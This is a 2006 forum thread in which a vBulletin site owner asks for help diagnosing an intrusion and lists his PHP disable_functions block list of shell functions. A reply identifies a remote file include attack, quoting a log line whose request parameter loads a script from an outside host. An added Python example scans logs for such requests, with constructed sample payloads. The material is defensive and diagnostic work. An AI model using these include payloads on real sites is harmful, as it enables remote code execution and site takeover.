
Check log: what is that hacking method

Discussion in 'General Discussion' started by kuwaitnt, Nov 25, 2006.

  1. kuwaitnt

    Hello,

    I have some strange hacking on my box:

    http://3zz.cc/iplog2.txt

    That is the log from my web site.

    It is on a shared server with CentOS 4.4.
    I am running the latest version of vBulletin.

    The server is well secured, but I don't know what this hacking method is.

    Can anyone help us prevent it?


    I know the hacker is getting the help.txt file from his web site,

    but I don't know where he puts that file. I have checked my web site and there are no suspicious files. I checked the log, and I also don't know the name he requests to hack my web site.

    I think he can delete, read and change files and folders on my web site, and I think he can also control my website from another web site on that server.



    Note:

    I am using PHP 4.4.4 with safe_mode and this disable_functions list:

    phpinfo, mkdir, unlink, symlink, ini_restore, popen, pclose, system, exec, shell_exec, suExec, dl, passthru, pclose, proc_open, proc_nice, proc_terminate, proc_get_status, proc_close, leak, posix_kill, posix_mkfifo, posix_setpgid, posix_setsid, posix_setuid, posix_uname, posix_getpwuid, escapeshellcmd, escapeshellarg, fpassthru, psockopen, cmd, backtick, virtual, pcntl_exec , ini_alter, parse_ini_file, show_source, apache_child_terminate, apache_get_modules , apache_get_version , apache_note, openlog, popens, filegetcontents, get_dir, dos_conv, myshellexec, get_current_user, php_uname, fileperms, filegroup, fileowner, getmyuid, getmygid

    I have set allow_url_fopen to off,

    and PHP runs with phpsuexec.


    I have installed mod_security with accunett rules or other rules I have added.

    I have installed rfx network LES.

    My system is CentOS 4.4 with the current cPanel version.



    I know the person who is trying to hack me, and I know he gets files onto my website or another web site on my server and then tries hacking.
     
  2. ramprage

    Looks like a common attack on register_globals using a remote include.
    Check your web.php file at the includet variable. It's probably not properly coded.

    Sat Nov 25 16:21:16 2006 1 91.140.140.49 6038 /home/nokia3/pub62.150.187.89 - - [20/Nov/2006:15:55:14 +0300] "GET /web.php?inludet=http://www.arabdesing.com/help.txt? HTTP/1.1" 403 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
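
An added example, not part of any post in this thread: a Python scan of Apache combined-format access log lines for the pattern ramprage describes, a query parameter whose value is a remote URL. The function name and the sample log lines (documentation IP ranges, `remote.example`) are constructed for illustration; the `/web.php` path and `inludet` parameter are taken from the log line quoted above.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Fields needed from a combined-format line: client IP, request target, status.
LOG_RE = re.compile(
    r'(?P<ip>\d{1,3}(?:\.\d{1,3}){3}) \S+ \S+ \[[^\]]+\] '
    r'"[A-Z]+ (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# A parameter value that is itself a URL is the mark of a remote include attempt.
REMOTE_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

def find_remote_include_attempts(lines):
    """Return one finding per query parameter whose decoded value is a remote URL."""
    findings = []
    for line in lines:
        m = LOG_RE.search(line)  # search() tolerates junk before the client IP
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        status = int(m.group("status"))
        # parse_qsl percent-decodes, so http%3A%2F%2F... is caught as well.
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            if REMOTE_RE.match(value.strip()):
                findings.append({
                    "ip": m.group("ip"),
                    "script": parts.path,
                    "param": name,
                    "remote": value,
                    "status": status,
                    # 2xx means the script ran with that value: review it first.
                    "served": 200 <= status < 300,
                })
    return findings

# Constructed sample lines (not from the poster's log).
SAMPLE_LOG = [
    '192.0.2.10 - - [20/Nov/2006:15:55:14 +0300] "GET /web.php?inludet=http://remote.example/help.txt? HTTP/1.1" 403 - "-" "Mozilla/4.0"',
    '192.0.2.10 - - [20/Nov/2006:15:56:02 +0300] "GET /web.php?inludet=http%3A%2F%2Fremote.example%2Fhelp.txt%3F HTTP/1.1" 200 512 "-" "Mozilla/4.0"',
    '198.51.100.7 - - [20/Nov/2006:16:01:40 +0300] "GET /showthread.php?t=42 HTTP/1.1" 200 18211 "-" "Mozilla/4.0"',
    '198.51.100.7 - - [20/Nov/2006:16:02:11 +0300] "GET /redirect.php?url=/forum/index.php HTTP/1.1" 302 - "-" "Mozilla/4.0"',
]

if __name__ == "__main__":
    for f in find_remote_include_attempts(SAMPLE_LOG):
        state = "SERVED" if f["served"] else "refused"
        print(f'{f["ip"]} {f["script"]} {f["param"]}={f["remote"]} {f["status"]} {state}')
```

A 403 on such a request, as in the quoted log line, means the server refused it; any 2xx hit identifies a script and parameter to audit.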
     
  3. kuwaitnt

    root@dnsbox [/tmp]# php -i | grep global
    register_globals => Off => Off



    It is off on that server,

    but I don't understand what this is:


    /home/nokia3/public_html/includes/init.php a _ i r nokia3 ftp 1 * c


    There is something, I think, about chown or chmod of files, or some FTP issue?


    I really don't know what he is trying to do :(

    as the server is really well secured, but I don't understand what he is doing.
     
  4. kuwaitnt

    Hello,

    For your information: I have set register_globals off and allow_url_fopen to off.

    When I was checking the domlog files I noticed

    he has uploaded files via the web; in the past he uploaded an encoded file in the cgi-bin folder,

    and I need to know what his method of hacking my web sites is, so that I can prevent it.

    I think I will make mod_security rules for that request: a _ i r nokia3 ftp 1 * c

    But what about the user name too, how can I do that?
     